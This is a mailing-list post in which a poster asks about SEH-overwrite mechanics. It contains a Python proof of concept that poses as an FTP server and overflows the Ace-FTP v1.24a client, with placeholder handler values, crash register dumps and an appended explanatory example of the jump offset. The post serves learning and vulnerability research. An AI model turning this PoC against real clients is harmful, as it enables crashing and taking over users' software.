Vuln Dev
SEH overwrite Jun 10 2007 08:33PM
KaCo678 aol com
Hey, I was wondering if anyone would be able to help; I have a few questions about overwriting the SEH handlers. I have written a PoC for a buffer overflow. The problem was I didn't overwrite EIP, but did write to a few registers; also there are a few that hold the buffer. My question is: I write to the NEXT_SEH_RECORD, so I do a 6-byte jmp. Why do we do a 6-byte jmp? If we do a 6-byte jump, doesn't that mean that when we do pop pop ret the pop pop won't be executed and it lands on the ret? Little confused about that. Also I was wondering how I would know which 2 registers to pop off the stack. Any help would be great; I will provide a PoC for what I'm talking about.

My original advisory can be found here.

http://www.milw0rm.com/exploits/4058

#!/usr/bin/python

#######################################################################
# Credit to n00b for finding the bug.
# Ace-Ftp client buffer overflow PoC.
# This is possible to exploit as we smash the SEH handlers and there are
# plenty of registers that had our buffer.
# I'm still new to SEH overwrites; I haven't had much experience with the
# SEH overwrite but get the idea from what I've read about it.
# Anyway, this script creates a listening socket and acts as an FTP server;
# when the client connects a huge buffer is sent back to the client,
# resulting in a buffer overflow.
# If anyone feels like investigating or writing a PoC for this please do so
# and give some credits to n00b. I will give it a try during the week.
#######################################################################
# Shouts: - Str0ke - Marsu - SM - vade79 - c0ntex - Kevin Finisterre
#######################################################################
# Tested: Win XP SP2.
# Version Affected: v1.24a.
###################################################
# \\Debug info//
###################################################
# Program received signal SIGSEGV, Segmentation fault.
# [Switching to thread 1312.0x714]
# 0x00403c58 in ?? ()
#
# (gdb) i r
#
# eax 0x41414141 1094795585 <---- Eax overwritten..
# ecx 0x0 0
# edx 0xa5b464 10859620
# ebx 0x41414141 1094795585 <---- Ebx overwritten..
# esp 0x12e458 0x12e458
# ebp 0x12f48c 0x12f48c
# esi 0x12e488 1238152
# edi 0xa5b464 10859620
# eip 0x403c58 0x403c58
# eflags 0x10206 66054
# cs 0x1b 27
# ss 0x23 35
# ds 0x23 35
# es 0x23 35
# fs 0x3b 59
# gs 0x0 0
# fctrl 0xffff1272 -60814
# fstat 0xffff0000 -65536
# ftag 0xffffffff -1
# fiseg 0x0 0
# fioff 0x0 0
# foseg 0xffff0000 -65536
# fooff 0x0 0
###################################################
# What the registers look like after the crash..
###################################################
# EAX 41414141
# ECX 00000000
# EDX 00A5D930 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA
# EBX 41414141
# ESP 0012E458
# EBP 0012F48C ASCII "AAAAAAAAAAAADDDDEEEECCCCCCC
# ESI 0012E488 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA
# EDI 00A5D930 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA
# EIP 00403C58
###################################################
# DS:[41414141]=???
# EDX=00A5D930, (ASCII "AAAAAAAAAAAAAAAAAAAAAAAAA)
# MOV EDX,DWORD PTR DS:[EAX]
###################################################
# SEH chain of main thread
# Address SE handler
# ---------------------------
# 0012E46C AceXFTP.00430B9E
# 45454545
# ---------------------------
# 0012F498 44444444 Pointer to next SEH record
# 0012F49C 45454545 SE handler
#
# 4112 bytes to overwrite the pointer to the next SEH record;
# the next 4 bytes overwrite the SE handler.
###################################################

from socket import *
from struct import pack
from time import sleep  # needed for sleep() below

host = "127.0.0.1"
port = 21
Size_of_buf1 = 4112  # filler up to the "pointer to next SEH record" field
Size_of_buf2 = 550   # trailing data after the SE handler field

# Act as the FTP server and wait for the client to connect.
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print("\nPort %d open Waiting !!!! ..." % port)
cl, addr = s.accept()
print("Vic is connected %s" % addr[0])

buf1 = b"A" * Size_of_buf1
NEXT_SEH_RECORD = b"\x44\x44\x44\x44"  # lands in the "pointer to next SEH record" field
SE_HANDLER = b"\x45\x45\x45\x45"       # lands in the SE handler field
buf2 = b"C" * Size_of_buf2
End = b"\r\n"

# Send the oversized response back to the connected client.
cl.send(buf1 + NEXT_SEH_RECORD + SE_HANDLER + buf2 + End)
print("mission accomplished : OK\n")
sleep(3)
cl.close()
s.close()
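Added example (not from the original post or the PoC above) that models the SEH record layout the PoC reaches, using the 4112-byte offset from the post: it decodes a 2-byte short jmp placed in the next-record field and shows that a displacement of 6 lands on the first byte after the 4-byte handler field, which is why that distance is used. It assumes the x86 short-jump encoding (EB rel8, signed, relative to the following instruction) and 32-bit little-endian record fields.

```python
import struct

# Offsets taken from the post: 4112 filler bytes reach the "pointer to next
# SEH record" field, the following 4 bytes overwrite the SE handler field.
OFFSET_NSEH = 4112
OFFSET_SEH = OFFSET_NSEH + 4
FIRST_BYTE_AFTER_RECORD = OFFSET_SEH + 4   # 4120, start of buf2 in the PoC

def build_layout(nseh, handler, tail):
    """Constructed buffer with the same shape as the PoC's payload."""
    assert len(nseh) == 4 and len(handler) == 4
    return b"A" * OFFSET_NSEH + nseh + handler + tail

def record_fields(buf):
    """Triage helper: return (nSEH, handler) as the debugger's SEH-chain view
    shows them (32-bit little-endian), e.g. (0x44444444, 0x45454545)."""
    nseh = struct.unpack("<I", buf[OFFSET_NSEH:OFFSET_SEH])[0]
    handler = struct.unpack("<I", buf[OFFSET_SEH:FIRST_BYTE_AFTER_RECORD])[0]
    return nseh, handler

def short_jmp_target(buf, at):
    """Decode an x86 short jump (EB rel8) at buf[at]; rel8 is signed and
    relative to the next instruction, so the target is at + 2 + rel8."""
    opcode, rel8 = buf[at], buf[at + 1]
    if opcode != 0xEB:
        raise ValueError("no short jmp at offset %d" % at)
    rel = rel8 - 256 if rel8 > 127 else rel8
    return at + 2 + rel

def jump_skips_handler(rel8):
    """True when a short jmp with displacement rel8 in the nSEH field lands
    exactly on the first byte after the handler field: 2 bytes of jmp are
    consumed, so 6 skips the remaining 2 nSEH bytes plus the 4-byte handler."""
    buf = build_layout(bytes([0xEB, rel8, 0x90, 0x90]), b"\x45" * 4, b"C" * 16)
    return short_jmp_target(buf, OFFSET_NSEH) == FIRST_BYTE_AFTER_RECORD
```

The pop/pop/ret sequence lives at the address placed in the handler field and runs in full; its ret transfers to the next-record field, so the jmp there executes after the gadget, not instead of it.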

Copyright 2010, SecurityFocus